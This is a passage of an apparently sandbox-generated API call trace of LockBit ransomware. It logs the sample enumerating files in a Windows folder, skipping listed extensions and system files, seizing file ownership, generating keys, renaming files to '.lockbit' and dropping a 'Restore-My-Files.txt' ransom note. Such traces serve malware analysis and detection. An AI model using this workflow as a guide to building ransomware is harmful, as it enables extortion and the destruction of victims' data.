(FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.821] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.821] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=3082) returned 1 [0082.821] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.822] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.822] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.822] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.822] ReadFile (in: hFile=0x3bc, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0082.853] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.853] malloc (_Size=0xd6) returned 0x77d800 [0082.853] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xd6, FileInformationClass=0xa) returned 0xc0000008 [0082.853] free (_Block=0x77d800) [0082.853] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\PreviousMenuButtonIconSubpi.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.853] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.853] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.853] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x700ec2d0, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x700ec2d0, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4dda33b1, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0xc24, dwReserved0=0x0, dwReserved1=0x0, cFileName="redmenu.png", cAlternateFileName="")) returned 1 [0082.853] lstrcmpiW (lpString1=".", lpString2="redmenu.png") returned -1 [0082.853] lstrcmpiW (lpString1="..", lpString2="redmenu.png") returned -1 [0082.853] PathFindExtensionW (pszPath="redmenu.png") returned=".png" [0082.853] lstrcmpiW (lpString1=".386", lpString2=".png") returned -1 [0082.853] lstrcmpiW (lpString1=".cmd", lpString2=".png") returned -1 [0082.853] lstrcmpiW (lpString1=".exe", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".ani", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".adv", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".theme", lpString2=".png") returned 1 [0082.854] lstrcmpiW (lpString1=".msi", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".msp", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".com", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".diagpkg", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".nls", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".diagcab", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".lock", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".ocx", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".mpa", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".cpl", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".mod", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".hta", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".icns", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".prf", lpString2=".png") returned 1 [0082.854] lstrcmpiW (lpString1=".rtp", lpString2=".png") returned 1 [0082.854] lstrcmpiW (lpString1=".diagcfg", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".msstyles", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".bin", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".shs", lpString2=".png") returned 1 [0082.854] lstrcmpiW (lpString1=".drv", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".wpx", lpString2=".png") returned 1 [0082.854] lstrcmpiW (lpString1=".bat", lpString2=".png") returned -1 [0082.854] lstrcmpiW (lpString1=".rom", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".msc", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".spl", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".ps1", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".msu", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".ics", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".key", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".mp3", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".reg", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".dll", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".ini", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".idx", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".sys", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".hlp", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".ico", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".lnk", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1=".rdp", lpString2=".png") returned 1 [0082.855] lstrcmpiW (lpString1=".lockbit", lpString2=".png") returned -1 [0082.855] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="redmenu.png") returned 1 [0082.855] lstrcmpiW (lpString1="ntldr", lpString2="redmenu.png") returned -1 [0082.855] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="redmenu.png") returned -1 [0082.855] lstrcmpiW (lpString1="bootsect.bak", lpString2="redmenu.png") returned -1 [0082.855] lstrcmpiW (lpString1="autorun.inf", lpString2="redmenu.png") returned -1 [0082.855] lstrcmpiW (lpString1="thumbs.db", lpString2="redmenu.png") returned 1 [0082.855] lstrcmpiW (lpString1="iconcache.db", lpString2="redmenu.png") returned -1 [0082.855] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.855] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png") returned=".png" [0082.856] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".7z", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".ckp", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dacpac", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".db", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".db-shm", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".db-wal", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".db3", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dbc", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dbs", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dbt", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".dbv", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".frm", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".mdf", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".mrg", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".mwb", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".myd", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".ndf", lpString2=".png") returned -1 [0082.856] lstrcmpiW (lpString1=".qry", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".sdb", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".sdf", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".sql", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".sqlite", lpString2=".png") returned 1 [0082.856] lstrcmpiW (lpString1=".sqlite3", lpString2=".png") returned 1 [0082.857] lstrcmpiW (lpString1=".sqlitedb", lpString2=".png") returned 1 [0082.857] lstrcmpiW (lpString1=".tmd", lpString2=".png") returned 1 [0082.857] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png.lockbit") returned 76 [0082.857] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.857] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.857] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.858] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.858] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.858] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.858] RtlFreeAnsiString (AnsiString="\\") [0082.858] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3bc) returned 0x0 [0082.858] malloc (_Size=0x200) returned 0x77d800 [0082.858] NtQueryInformationToken (in: TokenHandle=0x3bc, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.859] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.859] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.859] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.860] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.860] CloseHandle (hObject=0x3bc) returned 1 [0082.860] free (_Block=0x77d800) [0082.860] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\redmenu.png"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3bc [0082.860] CreateIoCompletionPort (FileHandle=0x3bc, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.860] malloc (_Size=0x40068) returned 0x1fb18c0 [0082.861] GetFileSizeEx (in: hFile=0x3bc, lpFileSize=0x1fb18d8 | out: lpFileSize=0x1fb18d8*=3108) returned 1 [0082.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.861] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.861] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff18f4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff18f4) returned 0x0 [0082.861] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.862] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.862] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x1ff1904, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x1ff1904) returned 0x0 [0082.862] ReadFile (in: hFile=0x3bc, lpBuffer=0x1fb18f4, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0 | out: lpBuffer=0x1fb18f4*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1fb18c0) returned 1 [0082.863] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.863] malloc (_Size=0xae) returned 0x77d800 [0082.863] NtSetInformationFile (FileHandle=0x3bc, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xae, FileInformationClass=0xa) returned 0x0 [0082.864] free (_Block=0x77d800) [0082.864] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\redmenu.png" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance") returned 1 [0082.864] wsprintfW (in: param_1=0x3d6a878, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt") returned 77 [0082.864] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Restore-My-Files.txt" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.864] FindNextFileW (in: hFindFile=0x55fe78, lpFindFileData=0x3d6b120 | out: lpFindFileData=0x3d6b120*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x70327743, ftCreationTime.dwHighDateTime=0x1ca03fb, ftLastAccessTime.dwLowDateTime=0x70327743, ftLastAccessTime.dwHighDateTime=0x1ca03fb, ftLastWriteTime.dwLowDateTime=0x4ddc950f, ftLastWriteTime.dwHighDateTime=0x1c9ea0f, nFileSizeHigh=0x0, nFileSizeLow=0x8232c, dwReserved0=0x0, dwReserved1=0x0, cFileName="Scene_loop.wmv", cAlternateFileName="")) returned 1 [0082.864] lstrcmpiW (lpString1=".", lpString2="Scene_loop.wmv") returned -1 [0082.864] lstrcmpiW (lpString1="..", lpString2="Scene_loop.wmv") returned -1 [0082.864] PathFindExtensionW (pszPath="Scene_loop.wmv") returned=".wmv" [0082.864] lstrcmpiW (lpString1=".386", lpString2=".wmv") returned -1 [0082.864] lstrcmpiW (lpString1=".cmd", lpString2=".wmv") returned -1 [0082.864] lstrcmpiW (lpString1=".exe", lpString2=".wmv") returned -1 [0082.864] lstrcmpiW (lpString1=".ani", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".adv", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".theme", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".msi", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".msp", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".com", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".diagpkg", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".nls", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".diagcab", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".lock", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".ocx", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".mpa", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".cpl", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".mod", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".hta", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".icns", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".prf", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".rtp", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".diagcfg", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".msstyles", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".bin", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".shs", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".drv", lpString2=".wmv") returned -1 [0082.865] lstrcmpiW (lpString1=".wpx", lpString2=".wmv") returned 1 [0082.865] lstrcmpiW (lpString1=".bat", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".rom", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".msc", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".spl", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".ps1", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".msu", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".ics", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".key", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".mp3", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".reg", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".dll", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".ini", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".idx", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".sys", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".hlp", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".ico", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".lnk", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".rdp", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1=".lockbit", lpString2=".wmv") returned -1 [0082.866] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="Scene_loop.wmv") returned -1 [0082.866] lstrcmpiW (lpString1="ntldr", lpString2="Scene_loop.wmv") returned -1 [0082.866] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="Scene_loop.wmv") returned -1 [0082.866] lstrcmpiW (lpString1="bootsect.bak", lpString2="Scene_loop.wmv") returned -1 [0082.866] lstrcmpiW (lpString1="autorun.inf", lpString2="Scene_loop.wmv") returned -1 [0082.866] lstrcmpiW (lpString1="thumbs.db", lpString2="Scene_loop.wmv") returned 1 [0082.867] lstrcmpiW (lpString1="iconcache.db", lpString2="Scene_loop.wmv") returned -1 [0082.867] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance" | out: pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\") returned="" [0082.867] PathFindExtensionW (pszPath="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv") returned=".wmv" [0082.867] lstrcmpiW (lpString1=".rar", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".zip", lpString2=".wmv") returned 1 [0082.867] lstrcmpiW (lpString1=".7z", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".ckp", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dacpac", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".db", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".db-shm", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".db-wal", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".db3", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dbf", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dbc", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dbs", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dbt", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".dbv", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".frm", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".mdf", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".mrg", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".mwb", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".myd", lpString2=".wmv") returned -1 [0082.867] lstrcmpiW (lpString1=".ndf", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".qry", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sdb", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sdf", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sql", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sqlite", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sqlite3", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".sqlitedb", lpString2=".wmv") returned -1 [0082.868] lstrcmpiW (lpString1=".tmd", lpString2=".wmv") returned -1 [0082.868] wsprintfW (in: param_1=0x3d6a668, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv.lockbit") returned 79 [0082.868] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0082.869] GetProcAddress (hModule=0x77c40000, lpProcName="RtlFreeUnicodeString") returned 0x77c6e126 [0082.869] GetProcAddress (hModule=0x77c40000, lpProcName="RtlDosPathNameToNtPathName_U_WithStatus") returned 0x77c81660 [0082.869] RtlDosPathNameToNtPathName_U_WithStatus () returned 0x0 [0082.869] GetProcAddress (hModule=0x77c40000, lpProcName="NtOpenFile") returned 0x77c5fd54 [0082.869] GetProcAddress (hModule=0x77c40000, lpProcName="CloseHandle") returned 0x0 [0082.869] RtlFreeAnsiString (AnsiString="\\") [0082.869] NtOpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x3d6ace0 | out: TokenHandle=0x3d6ace0*=0x3c4) returned 0x0 [0082.870] malloc (_Size=0x200) returned 0x77d800 [0082.870] NtQueryInformationToken (in: TokenHandle=0x3c4, TokenInformationClass=0x1, TokenInformation=0x77d800, TokenInformationLength=0x200, ReturnLength=0x3d6acd8 | out: TokenInformation=0x77d800, ReturnLength=0x3d6acd8) returned 0x0 [0082.870] InitializeSecurityDescriptor (in: pSecurityDescriptor=0x3d6aa94, dwRevision=0x1 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.870] SetSecurityDescriptorOwner (in: pSecurityDescriptor=0x3d6aa94, pOwner=0x77d808*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x25)), bOwnerDefaulted=0 | out: pSecurityDescriptor=0x3d6aa94) returned 1 [0082.870] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", SecurityInformation=0x1, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.870] SetFileSecurityW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv", SecurityInformation=0x4, pSecurityDescriptor=0x3d6aa94) returned 1 [0082.871] CloseHandle (hObject=0x3c4) returned 1 [0082.871] free (_Block=0x77d800) [0082.871] CreateFileW (lpFileName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\performance\\scene_loop.wmv"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x3c4 [0082.871] CreateIoCompletionPort (FileHandle=0x3c4, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0082.871] malloc (_Size=0x40068) returned 0x1ff1e60 [0082.871] GetFileSizeEx (in: hFile=0x3c4, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=533292) returned 1 [0082.871] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0082.872] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0082.872] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0082.872] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0082.872] ReadFile (in: hFile=0x3c4, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0082.880] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv.lockbit", NtPathName=0x3d6acc0, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Performance\\Scene_loop.wmv.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0082.880] malloc (_Size=0xb4) returned 0x77d800 [0082.880] NtSetInformationFile (FileHandle=0x3c4, IoStatusBlock=0x3d6aa8c, FileInformation=0x77d800, Length=0xb4, FileInformationClass=0xa) returned 0x0 [0082.880] free 